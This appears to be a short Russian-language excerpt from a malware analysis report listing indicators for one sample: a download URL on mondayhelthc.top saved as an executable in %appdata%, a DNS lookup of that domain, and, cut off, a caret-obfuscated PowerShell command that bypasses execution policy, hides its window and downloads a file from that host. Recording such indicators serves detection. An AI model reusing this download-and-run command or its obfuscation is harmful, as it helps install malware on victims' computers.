Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POweR^ShEl^L.^Ex^E -eX^e^CU^TiOnpOLICY b^y^pASS ^-^No^PrOfILe -wI^NdO^Ws^ty^le h^iDDeN (n^Ew-^ob^JE^cT syST^e^M.^net^.^Web^c^l^IeNT).D^oWN^l^oaDf^ILE('http://mondayhelthc...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "POweR^ShEl^L.^Ex^E -eX^e^CU^TiOnpOLICY b^y^pASS ^-^No^PrOfILe -wI^NdO^Ws^ty^le h^iDDeN (n^Ew-^ob^JE^cT syST^e^M.^net^.^Web^c^l^IeNT).D^oWN^l^oaDf^ILE('http://mondayhelthc...' (со скрытым окном)